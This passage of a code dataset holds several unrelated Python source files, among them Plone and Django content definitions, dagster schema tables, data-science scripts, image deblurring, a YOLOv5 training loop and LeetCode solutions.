Starts\"),\n with_time=1,\n with_popup=1,\n js_shortcuts=0,\n ignore_unset_time=1)\n\n schema['endDate'].widget = CalendarWidget(label = _(u\"label_event_end\", \"Event Ends\"),\n with_time=1,\n with_popup=1,\n js_shortcuts=0,\n ignore_unset_time=1)\n\n return schema\n\nVSSubEventSchema = ATEvent.schema.copy()\nfinalizeATCTSchema(VSSubEventSchema, folderish=False, moveDiscussion=True)\n\nclass VSSubEvent(VSEvent):\n \"\"\" vs.event \"\"\"\n\n implements(IVSSubEvent)\n meta_type = 'VSSubEvent'\n schema = modifySubEventSchema(VSSubEventSchema)\n\natapi.registerType(VSSubEvent, PROJECTNAME)\n","repo_name":"collective/vs.event","sub_path":"vs/event/content/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":12580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37289889666","text":"# Question 55 Question Write a program which accepts a sequence of words separated by whitespace as input to print\n# the words composed of digits only. Example: If the following words is given as input to the program: 2 cats and 3\n# dogs. 
Then, the output of the program should be: ['2', '3'] In case of input data being supplied to the question,\n# it should be assumed to be a console input. Hints: Use re.findall() to find all substrings using regex.\n\nfrom re import findall\n\n\ndef only_digits(text):\n\tnumbers = findall('[0-9]+', text)\n\tprint(numbers)\n\n\nl = '2 cats and 3 dogs'\nonly_digits(l)\n\n# caveat: findall scans the whole text rather than whole words, so if the input were 'd0gs', the list would also contain '0'\n","repo_name":"faellie182/Nauka-pythona","sub_path":"breaking_the_ice_with_python/55_str_with_digits_only.py","file_name":"55_str_with_digits_only.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2134952060","text":"# A robot moves in a plane starting from the origin (0,0). The robot can move UP, DOWN, LEFT or RIGHT by a given number of steps.\n# The trace of robot movement is shown as the following:\n# The numbers after the direction are steps.\n# Please write a program to compute the distance between the current position and the origin after a sequence of movements.\n# Example: If the following tuples are given as input to the program:\n# UP 5\n# DOWN 3\n# LEFT 3\n# RIGHT 2\n\n# Then, the output of the program should be: 2.23606\n\n\n\nimport math\npos = [0,0]\n\nwhile True:\n    s = input()\n\n    if len(s) == 0:\n        break\n    activity = s.split(\" \")\n\n    direction = activity[0]\n    steps_taken = int(activity[1])\n\n    if direction == 'UP':\n        pos[0] += steps_taken\n    elif direction == 'DOWN':\n        pos[0] -= steps_taken\n    elif direction == 'LEFT':\n        pos[1] -= steps_taken\n    elif direction == 'RIGHT':\n        pos[1] += steps_taken\n    else:\n        pass\n\nprint(pos)\n\nprint(math.sqrt(pos[0]**2 + pos[1]**2))","repo_name":"csumithra/pythonUtils","sub_path":"21_compute_distance.py","file_name":"21_compute_distance.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9888535427","text":"import sqlalchemy as db\nfrom sqlalchemy.dialects import sqlite\n\nfrom ..sql import MySQLCompatabilityTypes, get_current_timestamp\n\nScheduleStorageSqlMetadata = db.MetaData()\n\nJobTable = db.Table(\n    \"jobs\",\n    ScheduleStorageSqlMetadata,\n    db.Column(\n        \"id\",\n        db.BigInteger().with_variant(sqlite.INTEGER(), \"sqlite\"),\n        primary_key=True,\n        autoincrement=True,\n    ),\n    db.Column(\"job_origin_id\", db.String(255), unique=True),\n    db.Column(\"selector_id\", db.String(255)),\n    db.Column(\"repository_origin_id\", db.String(255)),\n    db.Column(\"status\", db.String(63)),\n    db.Column(\"job_type\", db.String(63), index=True),\n    db.Column(\"job_body\", db.Text),\n    db.Column(\"create_timestamp\", db.DateTime, server_default=get_current_timestamp()),\n    db.Column(\"update_timestamp\", db.DateTime, server_default=get_current_timestamp()),\n)\n\nInstigatorsTable = db.Table(\n    \"instigators\",\n    ScheduleStorageSqlMetadata,\n    db.Column(\n        \"id\",\n        db.BigInteger().with_variant(sqlite.INTEGER(), \"sqlite\"),\n        primary_key=True,\n        autoincrement=True,\n    ),\n    db.Column(\"selector_id\", db.String(255), unique=True),\n    db.Column(\"repository_selector_id\", db.String(255)),\n    db.Column(\"status\", db.String(63)),\n    db.Column(\"instigator_type\", db.String(63), index=True),\n    db.Column(\"instigator_body\", db.Text),\n    db.Column(\"create_timestamp\", db.DateTime, server_default=get_current_timestamp()),\n    db.Column(\"update_timestamp\", db.DateTime, 
server_default=get_current_timestamp()),\n)\n\nJobTickTable = db.Table(\n    \"job_ticks\",\n    ScheduleStorageSqlMetadata,\n    db.Column(\n        \"id\",\n        db.BigInteger().with_variant(sqlite.INTEGER(), \"sqlite\"),\n        primary_key=True,\n        autoincrement=True,\n    ),\n    db.Column(\"job_origin_id\", db.String(255), index=True),\n    db.Column(\"selector_id\", db.String(255)),\n    db.Column(\"status\", db.String(63)),\n    db.Column(\"type\", db.String(63)),\n    db.Column(\"timestamp\", db.types.TIMESTAMP),\n    db.Column(\"tick_body\", db.Text),\n    db.Column(\"create_timestamp\", db.DateTime, server_default=get_current_timestamp()),\n    db.Column(\"update_timestamp\", db.DateTime, server_default=get_current_timestamp()),\n)\n\nAssetDaemonAssetEvaluationsTable = db.Table(\n    \"asset_daemon_asset_evaluations\",\n    ScheduleStorageSqlMetadata,\n    db.Column(\n        \"id\",\n        db.BigInteger().with_variant(sqlite.INTEGER(), \"sqlite\"),\n        primary_key=True,\n        autoincrement=True,\n    ),\n    db.Column(\n        \"evaluation_id\", db.BigInteger().with_variant(sqlite.INTEGER(), \"sqlite\"), index=True\n    ),\n    db.Column(\"asset_key\", db.Text),\n    db.Column(\"asset_evaluation_body\", db.Text),\n    db.Column(\"num_requested\", db.Integer),\n    db.Column(\"num_skipped\", db.Integer),\n    db.Column(\"num_discarded\", db.Integer),\n    db.Column(\"create_timestamp\", db.DateTime, server_default=get_current_timestamp()),\n)\n\n\n# Secondary Index migration table, used to track data migrations, event_logs and runs.\n# This schema should match the schema in the event_log storage, run schema\nSecondaryIndexMigrationTable = db.Table(\n    \"secondary_indexes\",\n    ScheduleStorageSqlMetadata,\n    db.Column(\n        \"id\",\n        db.BigInteger().with_variant(sqlite.INTEGER(), \"sqlite\"),\n        primary_key=True,\n        autoincrement=True,\n    ),\n    db.Column(\"name\", MySQLCompatabilityTypes.UniqueText, unique=True),\n    db.Column(\"create_timestamp\", db.DateTime, server_default=get_current_timestamp()),\n    db.Column(\"migration_completed\", db.DateTime),\n)\n\ndb.Index(\n    \"idx_job_tick_status\",\n    JobTickTable.c.job_origin_id,\n    JobTickTable.c.status,\n    mysql_length=32,\n)\ndb.Index(\"idx_job_tick_timestamp\", JobTickTable.c.job_origin_id, JobTickTable.c.timestamp)\ndb.Index(\"idx_tick_selector_timestamp\", JobTickTable.c.selector_id, JobTickTable.c.timestamp)\n\ndb.Index(\n    \"idx_asset_daemon_asset_evaluations_asset_key_evaluation_id\",\n    AssetDaemonAssetEvaluationsTable.c.asset_key,\n    AssetDaemonAssetEvaluationsTable.c.evaluation_id,\n    mysql_length={\"asset_key\": 64},\n    unique=True,\n)\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster/_core/storage/schedules/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":4086,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"37034361186","text":"\"\"\"\r\nPregnancies = number of pregnancies\r\nGlucose = glucose\r\nBlood Pressure = blood pressure\r\nSkin Thickness = skin thickness\r\nInsulin = insulin\r\nBMI (Body Mass Index) = body mass index\r\nDiabetes Pedigree Function = a function estimating the likelihood of diabetes from one's family history\r\nAge = age\r\nOutcome = whether or not the person has diabetes\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom matplotlib import pyplot as plt\r\nimport missingno as msno\r\nimport os\r\nfrom sklearn.neighbors import LocalOutlierFactor\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn import preprocessing\r\nfrom helpers.eda import 
grab_col_names\r\n\r\npd.pandas.set_option('display.max_columns', None)\r\npd.set_option('display.float_format', lambda x: '%.3f' % x)\r\npd.set_option('display.width', 170)\r\n\r\ndf = pd.read_csv(\"datasets/diabetes.csv\")\r\n\r\ndf.info()\r\ndf.isnull().sum()\r\n\r\ndf.describe().T\r\n\r\ndf[[\"Glucose\", \"BloodPressure\", \"SkinThickness\", \"Insulin\", \"BMI\"]] = \\\r\n df[[\"Glucose\", \"BloodPressure\", \"SkinThickness\", \"Insulin\", \"BMI\"]].replace(0, np.NaN)\r\n\r\n\r\ndef outlier_thresholds(dataframe, col_name):\r\n quartile1 = dataframe[col_name].quantile(0.25)\r\n quartile3 = dataframe[col_name].quantile(0.75)\r\n interquantile_range = quartile3 - quartile1\r\n up_limit = quartile3 + 1.5 * interquantile_range\r\n low_limit = quartile1 - 1.5 * interquantile_range\r\n return low_limit, up_limit\r\n\r\n\r\ndef check_outlier(dataframe, col_name):\r\n low_limit, up_limit = outlier_thresholds(dataframe, col_name)\r\n if dataframe[(dataframe[col_name] > up_limit) | (dataframe[col_name] < low_limit)].any(axis=None):\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ncat_cols, cat_but_car, num_cols, num_but_cat = grab_col_names(df)\r\n\r\nfor col in num_cols:\r\n print(col, check_outlier(df, col))\r\n\r\n\r\ndef replace_with_thresholds(dataframe, col_name):\r\n low_limit, up_limit = outlier_thresholds(dataframe, col_name)\r\n if low_limit > 0:\r\n dataframe.loc[(dataframe[col_name] < low_limit), col_name] = low_limit\r\n dataframe.loc[(dataframe[col_name] > up_limit), col_name] = up_limit\r\n else:\r\n dataframe.loc[(dataframe[col_name] > up_limit), col_name] = up_limit\r\n\r\n\r\nfor col in num_cols:\r\n if col != \"Glucose\":\r\n replace_with_thresholds(df, col)\r\n\r\n# MISSING VALUES\r\ndf.isnull().sum()\r\n\r\n\r\ndef missing_values_table(dataframe, na_name=False):\r\n na_columns = [col for col in dataframe.columns if dataframe[col].isnull().sum() > 0]\r\n\r\n n_miss = dataframe[na_columns].isnull().sum().sort_values(ascending=False)\r\n\r\n ratio = (dataframe[na_columns].isnull().sum() / dataframe.shape[0] * 100).sort_values(ascending=False)\r\n\r\n missing_df = pd.concat([n_miss, np.round(ratio, 2)], axis=1, keys=['n_miss', 'ratio'])\r\n\r\n print(missing_df, end=\"\\n\")\r\n\r\n if na_name:\r\n return na_columns\r\n\r\n\r\nna_name = missing_values_table(df, na_name=True)\r\n\r\n\r\ndef missing_vs_target(dataframe, target, na_columns):\r\n temp_df = dataframe.copy()\r\n for col in na_columns:\r\n temp_df[col + '_NA_FLAG'] = np.where(temp_df[col].isnull(), 1, 0)\r\n na_flags = temp_df.loc[:, temp_df.columns.str.contains(\"_NA_\")].columns\r\n for col in na_flags:\r\n print(pd.DataFrame({\"TARGET_MEAN\": temp_df.groupby(col)[target].mean(),\r\n \"Count\": temp_df.groupby(col)[target].count()}), end=\"\\n\\n\\n\")\r\n\r\n\r\nmissing_vs_target(df, \"Outcome\", na_name)\r\n\r\ndf.pivot_table(df, index=[\"Outcome\"])\r\n\r\nfor col in df.columns:\r\n df.loc[(df[\"Outcome\"] == 0) & (df[col].isnull()), col] = df[df[\"Outcome\"] == 0][col].median()\r\n df.loc[(df[\"Outcome\"] == 1) & (df[col].isnull()), col] = df[df[\"Outcome\"] == 1][col].median()\r\n\r\n# FEATURE ENGINEERING\r\n\r\ndf.loc[(df[\"Age\"] < 18), \"NEW_AGE_CAT\"] = \"Young\"\r\ndf.loc[(df[\"Age\"] > 18) & (df[\"Age\"] < 56), \"NEW_AGE_CAT\"] = \"Mature\"\r\ndf.loc[(df[\"Age\"] > 56), \"NEW_AGE_CAT\"] = \"Old\"\r\n\r\ndf.loc[(df[\"BMI\"] < 18.5), \"NEW_BMI_CAT\"] = \"Underweight\"\r\ndf.loc[(df[\"BMI\"] > 18.5) & (df[\"BMI\"] < 25), \"NEW_BMI_CAT\"] = \"Normal\"\r\ndf.loc[(df[\"BMI\"] > 25) & (df[\"BMI\"] < 30), 
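\"NEW_BMI_CAT\"] = \"Overweight\"\r\n# editor's sketch (hedged): the chained .loc range assignments can be written as one pd.cut call; the bin edges below mirror the thresholds used here, and because the original comparisons are strict, exact boundary values such as BMI == 25 are left unlabeled:\r\n# df[\"NEW_BMI_CAT\"] = pd.cut(df[\"BMI\"], bins=[0, 18.5, 25, 30, 40, np.inf], labels=[\"Underweight\", \"Normal\", \"Overweight\", \"Obese\", \"Severe Obese\"])\r\ndf.loc[(df[\"BMI\"] > 25) & (df[\"BMI\"] < 30), 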
\"NEW_BMI_CAT\"] = \"Overweight\"\r\ndf.loc[(df[\"BMI\"] > 30) & (df[\"BMI\"] < 40), \"NEW_BMI_CAT\"] = \"Obese\"\r\ndf.loc[(df[\"BMI\"] > 40), \"NEW_BMI_CAT\"] = \"\tSevere Obese\"\r\n\r\ndf.loc[(df[\"Glucose\"] < 70), \"NEW_GLUCOSE_CAT\"] = \"Low\"\r\ndf.loc[(df[\"Glucose\"] > 70) & (df[\"Glucose\"] < 99), \"NEW_GLUCOSE_CAT\"] = \"Normal\"\r\ndf.loc[(df[\"Glucose\"] > 99) & (df[\"Glucose\"] < 126), \"NEW_GLUCOSE_CAT\"] = \"Secret\"\r\ndf.loc[(df[\"Glucose\"] > 126) & (df[\"Glucose\"] < 200), \"NEW_GLUCOSE_CAT\"] = \"High\"\r\n\r\ndf.loc[(df[\"BloodPressure\"] < 79), \"NEW_BLOODPRESSURE_CAT\"] = \"Normal\"\r\ndf.loc[(df[\"BloodPressure\"] > 79) & (df[\"BloodPressure\"] < 89), \"NEW_BLOODPRESSURE_CAT\"] = \"Hypertension_S1\"\r\ndf.loc[(df[\"BloodPressure\"] > 89) & (df[\"BloodPressure\"] < 123), \"NEW_BLOODPRESSURE_CAT\"] = \"Hypertension_S2\"\r\n\r\n\r\ndef set_insulin(row):\r\n if 16 <= row[\"Insulin\"] <= 166:\r\n return \"Normal\"\r\n else:\r\n return \"Abnormal\"\r\n\r\n\r\ndf[\"NEW_INSULIN_CAT\"] = df.apply(set_insulin, axis=1)\r\n\r\ndf.columns = [col.upper() for col in df.columns]\r\n\r\ndf.drop([\"BLOODPRESSURE\", \"GLUCOSE\", \"AGE\", \"BMI\", \"INSULIN\"], inplace=True, axis=1)\r\n\r\n\r\n# LABEL ENCODING\r\n\r\ndef label_encoder(dataframe, binary_col):\r\n labelencoder = preprocessing.LabelEncoder()\r\n dataframe[binary_col] = labelencoder.fit_transform(dataframe[binary_col].astype(str))\r\n return dataframe\r\n\r\n\r\nbinary_cols = [col for col in df.columns if df[col].dtypes == \"O\"\r\n and len(df[col].unique()) == 2]\r\n\r\nfor col in df.columns:\r\n label_encoder(df, col)\r\n\r\n\r\n# ONE-HOT ENCODING\r\n\r\ndef one_hot_encoder(dataframe, categorical_cols, drop_first=False):\r\n dataframe = pd.get_dummies(dataframe, columns=categorical_cols, drop_first=drop_first)\r\n return dataframe\r\n\r\n\r\nohe_cols = [col for col in df.columns if 10 >= len(df[col].unique()) > 2]\r\n\r\none_hot_encoder(df, ohe_cols, drop_first=True)\r\n\r\n# FEATURE SCALING\r\n\r\ntransformer = MinMaxScaler().fit(df[[\"DIABETESPEDIGREEFUNCTION\"]])\r\ndf[\"DIABETESPEDIGREEFUNCTION\"] = transformer.transform(df[[\"DIABETESPEDIGREEFUNCTION\"]])\r\n","repo_name":"serhatyazicioglu/Feature-Engineering","sub_path":"diabetes_feature_engineering.py","file_name":"diabetes_feature_engineering.py","file_ext":"py","file_size_in_byte":6104,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"72010190888","text":"from pathlib import Path\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy\nfrom scipy import ndimage, fft\nfrom PIL import Image\n\n\n# ----------------------------------------------------- load image ---------------------------------------------\nfolder = os.path.join(os.getcwd(), 'Lab04/')\nfile_name = os.path.join(folder, 'blurred_image.jpg')\n\n# Open the image with pillow and convert to numpy array\nimage = Image.open(file_name)\ncolor_pixels = np.asarray(Image.open(file_name))\ngray_pixels = np.asarray(Image.open(file_name).convert('L'))\n\n# summarize some details about the image\nprint(image.format)\nprint('numpy array:', gray_pixels.dtype)\nprint(gray_pixels.shape)\n\n# -------------------------------------------- generate the motion blur filter -----------------------------------------\nnFilter = 91\nangle = 45\nmy_filter = np.zeros((nFilter, nFilter))\nmy_filter[nFilter//2, :] = 1.0 / nFilter\nmy_filter = scipy.ndimage.rotate(my_filter, angle, reshape=False)\n\nnRows = gray_pixels.shape[0]\nnCols = 
gray_pixels.shape[1]\nnFFT = 1024\n\nimage_spectrum = scipy.fft.fft2(gray_pixels, (nFFT, nFFT))\nfilter_spectrum = scipy.fft.fft2(my_filter, (nFFT, nFFT))\n\nmodified_image_spectrum = image_spectrum * filter_spectrum\nmodified_image = scipy.fft.ifft2(modified_image_spectrum)\n# the kernel is centred, so the blurred result is shifted by half the filter size\nmodified_image = np.real(modified_image)[nFilter//2:nRows + nFilter//2, nFilter//2:nCols + nFilter//2]\n\n# --------------------------------------------------- reconstruct the image --------------------------------------------\n\nK = 0.02\nH_star = np.conj(filter_spectrum)\nF_hat = (H_star * image_spectrum) / (np.abs(filter_spectrum)**2 + K)\n\nreconstructed_image = np.real(scipy.fft.ifft2(F_hat))\nreconstructed_image = reconstructed_image[:gray_pixels.shape[0], :gray_pixels.shape[1]]  # Crop to original size\n\n# --------------------------------------------------------- display images ---------------------------------------------\nfig = plt.figure(1)\nplt.subplot(2, 2, 1)\nplt.title('Original Image')\nplt.imshow(gray_pixels, cmap='gray')\n\nplt.subplot(2, 2, 2)\nplt.title('Motion Blur Filter')\nplt.imshow(my_filter, cmap='gray')\n\nplt.subplot(2, 2, 3)\nplt.title('Modified Image')\nplt.imshow(modified_image, cmap='gray')\n\nplt.subplot(2, 2, 4)\nplt.title('Reconstructed Image')\nplt.imshow(reconstructed_image, cmap='gray')\n\nplt.show()\n","repo_name":"cgurtner/ZHAW-DIP","sub_path":"Lab04/exercise_2_setup.py","file_name":"exercise_2_setup.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10898461068","text":"# Leetcode 347\n\nimport heapq\nfrom collections import Counter\nclass Solution(object):\n    def topKFrequent(self, nums, k):\n        \"\"\"\n        :type nums: List[int]\n        :type k: int\n        :rtype: List[int]\n        \"\"\"\n        \n        if k == len(nums):\n            return nums\n        hashmap = Counter(nums) # Counter will create a hashmap based on frequency of numbers\n        return heapq.nlargest(k, hashmap.keys(), key=hashmap.get) #output the k largest numbers based on their freq\n        \n        # Time = O(nlogk), if k < n to build the heap\n        # Space = O(n+k), for hashmap and heap of k elements\n\n################################ USING QUICK SELECT ###############################################################\n        \nfrom typing import List\nfrom collections import Counter\nclass Solution:\n    def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n        if k == len(nums):\n            return nums\n        \n        hashmap = {}\n        for ele in nums:\n            hashmap[ele] = 1 + hashmap.get(ele,0)\n        keys = list(hashmap.keys())\n        return self.quick_select(keys,0,len(keys)-1,k,hashmap)\n        \n    def quick_select(self,input,start,end,k,hashmap):\n        if k == len(input):\n            return input\n        if start == end:\n            return input[end:]\n        pivot_index = self.partition(input,start,end,hashmap)\n        # print(pivot_index, input)\n        k_index = len(input)-k\n        if k_index > pivot_index:\n            return self.quick_select(input,pivot_index+1,end,k,hashmap)\n        elif k_index < pivot_index:\n            return self.quick_select(input,start,pivot_index-1,k,hashmap)\n        else:\n            return input[pivot_index:]\n        \n        \n    def partition(self,input,start,end,hashmap):\n        current = start\n        insert_index = start - 1\n        pivot_index = end\n        \n        while current < pivot_index:\n            if hashmap[input[current]] < hashmap[input[pivot_index]]:\n                insert_index += 1\n                input[current],input[insert_index] = input[insert_index],input[current]\n            current += 1\n        insert_index += 1\n        input[pivot_index],input[insert_index] = input[insert_index],input[pivot_index]\n        return insert_index\n        \n        \n    # Time = O(n) for quickselect, O(n^2) for worst case\n    # Space = O(n) for 
hashmap and array of unique elements\n","repo_name":"snagari-coder/Data_Structure_Algorithms","sub_path":"Sorting/TopKFrequency.py","file_name":"TopKFrequency.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14040558501","text":"from OutputWriter import OutputWriter\nfrom project_source import ProjectSource\nfrom comparison import Comparison\nfrom GeneralAnalyzer import GeneralAnalyzer\n\nclass ProjectSourceAnalyzer:\n def __init__(self):\n pass\n\n @staticmethod\n def analyzeEachSourceType(participants, question):\n\n for i in range(3):\n projectSource = ProjectSource(i+1)\n\n percentages = ProjectSourceAnalyzer.getResponsePercentages(participants, question, projectSource)\n OutputWriter.outputPercentages(percentages, question, \"percentage_results_%s.csv\" % str(projectSource))\n\n means = ProjectSourceAnalyzer.getResponseMeans(participants, question, projectSource)\n OutputWriter.outputMeans(means, question, \"mean_results_%s.csv\" % str(projectSource))\n\n\n @staticmethod\n def analyzeSourceTypeDifferencesPercentage(participants, question):\n #Eew, clean it up\n comparisons = []\n \n for i in range(3):\n projectSource1 = ProjectSource(i+1)\n\n for j in range(3):\n projectSource2 = ProjectSource(j+1)\n\n comparison = ProjectSourceAnalyzer.compareProjectSourcePercentages(projectSource1, projectSource2, participants, question)\n comparisons.append(comparison)\n\n return comparisons\n\n @staticmethod\n def analyzeSourceTypeDifferencesMeans(participants, question):\n #Eew, clean it up\n comparisons = []\n \n for i in range(3):\n projectSource1 = ProjectSource(i+1)\n\n for j in range(3):\n projectSource2 = ProjectSource(j+1)\n\n comparison = ProjectSourceAnalyzer.compareProjectSourceMeans(projectSource1, projectSource2, participants, question)\n comparisons.append(comparison)\n\n return comparisons\n\n @staticmethod\n def analyzeGeneralResults(participants, question):\n percentages = ProjectSourceAnalyzer.getResponsePercentages(participants, question)\n OutputWriter.outputPercentages(percentages, question, \"percentage_results.csv\")\n\n means = ProjectSourceAnalyzer.getResponseMeans(participants, question)\n OutputWriter.outputMeans(means, question, \"mean_results.csv\")\n\n @staticmethod\n def getResponsePercentages(participants, question, projectSource=None):\n counts = ProjectSourceAnalyzer.getResponseCounts(participants, question, projectSource)\n\n totals = [sum(dictionary.values()) for dictionary in counts]\n percentageResult = []\n percentDict = {}\n for i in range(len(counts)):\n percentDict = {}\n dictionary = counts[i]\n for key in dictionary.keys():\n percentDict[key] = (float(dictionary[key])/totals[i])*100\n percentageResult.append(percentDict)\n\n return percentageResult\n\n @staticmethod\n def getResponseMeans(participants, question, projectSource=None):\n counts = ProjectSourceAnalyzer.getResponseCounts(participants, question, projectSource)\n\n totals = [sum(dictionary.values()) for dictionary in counts]\n meanResults = []\n for i in range(len(counts)):\n dictionary = counts[i]\n sum_ = sum([int(key)*dictionary[key] for key in dictionary.keys()])\n meanResults.append(float(sum_)/totals[i])\n\n return meanResults\n\n @staticmethod\n def getResponseCounts(participants, question, projectSource=None):\n # print(experience)\n\n if projectSource is not None:\n participants = [p for p in participants if p.projectSource == projectSource]\n\n scoreSums = []\n for x in 
range(len(question.subquestions)):\n scoreSums.append(GeneralAnalyzer._blankAnswerDict(question))\n \n for participant in participants:\n questionList = getattr(participant, question.name).listed\n\n # print(questionList)\n\n for i in range(len(questionList)):\n currentValue = questionList[i]\n if currentValue is not None:\n scoreSums[i][questionList[i]] += 1\n\n\n return scoreSums\n\n @staticmethod \n def rankComparisons(comparisonList):\n subquestions = []\n for comparison in comparisonList:\n subquestions += comparison.splitSubquestions()\n\n subquestions.sort(key=lambda x: x.value, reverse=True)\n\n return subquestions\n\n @staticmethod \n def compareProjectSourcePercentages(projectSource1, projectSource2, participants, question):\n ps1Result = ProjectSourceAnalyzer.getResponsePercentages(participants, question, projectSource1)\n ps2Result = ProjectSourceAnalyzer.getResponsePercentages(participants, question, projectSource2)\n\n comparison = GeneralAnalyzer.compareDictResults(ps1Result, ps2Result)\n\n return Comparison(projectSource1, projectSource2, question, comparison)\n\n @staticmethod \n def compareProjectSourceMeans(projectSource1, projectSource2, participants, question):\n ps1Result = ProjectSourceAnalyzer.getResponseMeans(participants, question, projectSource1)\n ps2Result = ProjectSourceAnalyzer.getResponseMeans(participants, question, projectSource2)\n\n comparison = GeneralAnalyzer.compareListResults(ps1Result, ps2Result)\n\n return Comparison(projectSource1, projectSource2, question, comparison)","repo_name":"mckeesh/SurveyAnalysis","sub_path":"ProjectSourceAnalyzer.py","file_name":"ProjectSourceAnalyzer.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10675841939","text":"from utils.pascal_dataset import *\nfrom model.model import *\nfrom utils.loss import *\nimport config\n\nimport torch\nfrom torch.utils.data import DataLoader\nimport torch.optim as optim\n\nfrom tqdm import tqdm\n\n\nif __name__ == '__main__':\n model = YOLOv5(torch.tensor(config.ANCHORS),\n len(config.PASCAL_CLASSES),\n depth_multiple=config.DEPTH_MULTIPLE,\n width_multiple=config.WIDTH_MULTIPLE).to(config.DEVICE)\n model.train()\n optimizer = optim.Adam(model.parameters(), lr=config.LR, weight_decay=config.WEIGHT_DECAY)\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer,\n 'min',\n config.LR_SCHEDULER_FACTOR,\n config.LR_SCHEDULER_PATIENCE,\n config.LR_SCHEDULER_THRESHOLD)\n if config.LOAD_MODEL:\n checkpoint = torch.load(config.LOAD_PATH, map_location=config.DEVICE)\n model.load_state_dict(checkpoint[\"model\"])\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\n scaler = torch.cuda.amp.GradScaler()\n anchors = torch.tensor(config.ANCHORS) / config.IMAGE_SIZE\n dataset = PascalDataset(config.IMG_DIR,\n config.LABEl_PATH,\n classes=config.PASCAL_CLASSES,\n sizes=config.OUTPUT_SIZES,\n anchors = anchors,\n transform=config.train_transforms, )\n train_loader = DataLoader(dataset=dataset, batch_size=config.BATCH_SIZE, shuffle=True)\n scaled_anchors = (anchors * torch.tensor(config.OUTPUT_SIZES).unsqueeze(1).unsqueeze(1).repeat(1, 3, 2)).to(\n config.DEVICE)\n criterion = YoloLoss(scaled_anchors,\n len(config.PASCAL_CLASSES),\n config.LAMBDA_NOOBJ,\n config.LAMBDA_OBJ,\n config.LAMBDA_BOX,\n config.LAMBDA_CLS)\n for epoch in range(config.N_EPOCHS):\n loader_tqdm = tqdm(train_loader)\n losses = []\n for x, y in loader_tqdm:\n x = x.to(config.DEVICE)\n anchors = 
anchors.to(config.DEVICE)\n with torch.cuda.amp.autocast():\n output = model(x)\n loss = criterion(output, y)\n optimizer.zero_grad()\n scaler.scale(loss).backward()\n scaler.step(optimizer)\n scaler.update()\n losses.append(loss.item())\n lr = optimizer.param_groups[0][\"lr\"]\n mean_loss = sum(losses) / len(losses)\n loader_tqdm.set_postfix(mean_epoch_loss=mean_loss, lr=lr)\n mean_loss = sum(losses) / len(losses)\n scheduler.step(mean_loss)\n if config.SAVE_MODEL:\n torch.save(\n {\n \"model\": model.state_dict(),\n \"optimizer\": optimizer.state_dict()\n },\n config.SAVE_PATH)\n print('CHECKPOINT SAVED')\n","repo_name":"vladislav-shevchenko/simple-pytorch-yolov5","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70016156327","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport acceso.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('radicado', '0001_initial'),\n ('gestor', '0007_auto_20150901_1503'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Actividad',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=100)),\n ('titulo', models.CharField(max_length=200)),\n ('descripcion', models.TextField(max_length=2000)),\n ],\n ),\n migrations.CreateModel(\n name='Ciclo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=100)),\n ],\n ),\n migrations.CreateModel(\n name='Componente',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=100)),\n ],\n ),\n migrations.CreateModel(\n name='Corte',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fecha', models.DateTimeField(auto_now_add=True)),\n ('titulo', models.CharField(max_length=100)),\n ('descripcion', models.TextField(max_length=5000)),\n ],\n ),\n migrations.CreateModel(\n name='Encargado',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('encargado', models.CharField(max_length=100)),\n ],\n ),\n migrations.CreateModel(\n name='Entregables',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('entregables', models.CharField(max_length=1000)),\n ],\n ),\n migrations.CreateModel(\n name='Evidencia',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('soporte', models.FileField(upload_to=acceso.models.content_file_name, blank=True)),\n ('actividad', models.ForeignKey(to='acceso.Actividad')),\n ('ciclo', models.ForeignKey(to='acceso.Ciclo')),\n ('componente', models.ForeignKey(to='acceso.Componente')),\n ('corte', models.ForeignKey(blank=True, to='acceso.Corte', null=True)),\n ('encargado', models.ForeignKey(to='acceso.Encargado')),\n 